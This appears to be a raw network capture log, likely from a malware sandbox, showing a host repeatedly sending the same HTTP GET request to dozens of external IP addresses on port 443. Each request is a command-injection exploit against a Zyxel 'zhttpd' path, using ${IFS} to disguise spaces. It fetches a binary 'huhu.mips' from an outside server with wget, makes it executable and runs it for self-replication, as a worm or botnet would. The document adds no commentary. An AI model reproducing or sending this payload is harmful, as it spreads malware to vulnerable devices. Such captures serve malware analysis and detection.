                                                Jan 29, 2024 07:07:28.982479095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                459192.168.2.2332944160.105.57.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982508898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                460192.168.2.234374096.123.170.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982558966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                461192.168.2.23519969.29.77.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982599974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                462192.168.2.2354170191.52.229.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982646942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                463192.168.2.2340970136.57.25.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982678890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                464192.168.2.2357672195.243.207.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982736111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                465192.168.2.234332468.6.114.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982765913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                466192.168.2.233454044.107.168.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982795954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                467192.168.2.2345838137.169.0.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982841015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                468192.168.2.2338964207.114.22.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982897043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                469192.168.2.234250679.209.139.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982955933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                470192.168.2.235597479.187.17.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.982979059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                471192.168.2.233571283.138.43.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983010054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                472192.168.2.235981888.99.206.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983052015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                473192.168.2.234025677.39.171.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983081102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                474192.168.2.234725225.79.139.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983129025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                475192.168.2.2341478132.236.75.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983172894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                476192.168.2.234402061.108.119.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983227015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                477192.168.2.2344078208.154.51.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983242989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                478192.168.2.2347624189.217.167.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983273029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                479192.168.2.2344380195.230.0.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983320951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                480192.168.2.234036862.5.38.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983361959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                481192.168.2.2360638194.31.15.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983411074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                482192.168.2.2336750220.141.102.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983464003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                483192.168.2.2359578122.199.119.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983515978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                484192.168.2.234854013.20.157.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983547926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                485192.168.2.2337160195.11.188.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983583927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                486192.168.2.2344300136.97.75.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983642101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                487192.168.2.2341520172.185.32.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983669043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                488192.168.2.2338566105.115.246.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983690977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                489192.168.2.2349904142.84.187.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983767986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                490192.168.2.234451227.68.186.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983781099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                491192.168.2.235120096.136.242.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983808994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                492192.168.2.235472612.224.150.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983850956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                493192.168.2.2350414103.147.14.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983908892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                494192.168.2.235158836.2.26.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983932972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                495192.168.2.2337760208.23.39.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.983997107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                496192.168.2.234109078.32.42.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984025002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                497192.168.2.235041062.230.62.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984055996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                498192.168.2.2357626110.108.164.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984081030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                499192.168.2.2335980165.39.16.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984111071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                500192.168.2.2349680204.127.51.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984154940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                501192.168.2.2359756203.225.152.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984172106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                502192.168.2.235985414.244.179.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984214067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                503192.168.2.236058477.100.199.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984282017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                504192.168.2.234798285.76.179.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984369993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                505192.168.2.2345782160.90.236.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984441042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                506192.168.2.235971225.76.129.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984442949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                507192.168.2.2346230218.232.179.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984447956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                508192.168.2.2355486181.31.44.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984472036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                509192.168.2.234219817.90.126.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984477997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                510192.168.2.234327214.242.217.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.984523058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                511192.168.2.234417659.149.187.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988605022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                512192.168.2.235436854.129.40.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988646984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                513192.168.2.2337498105.210.197.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988677979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                514192.168.2.235204049.225.110.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988751888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                515192.168.2.2337606208.72.178.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988754988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                516192.168.2.2358342126.43.224.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988790035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                517192.168.2.2342668184.152.179.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988804102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                518192.168.2.233738049.54.48.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988867998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                519192.168.2.235136070.174.44.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988900900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                520192.168.2.2342832204.187.98.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988922119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                521192.168.2.234519670.192.223.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:28.988955975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                522192.168.2.2349786159.230.77.191443
                                                TimestampBytes transferredDirectionData
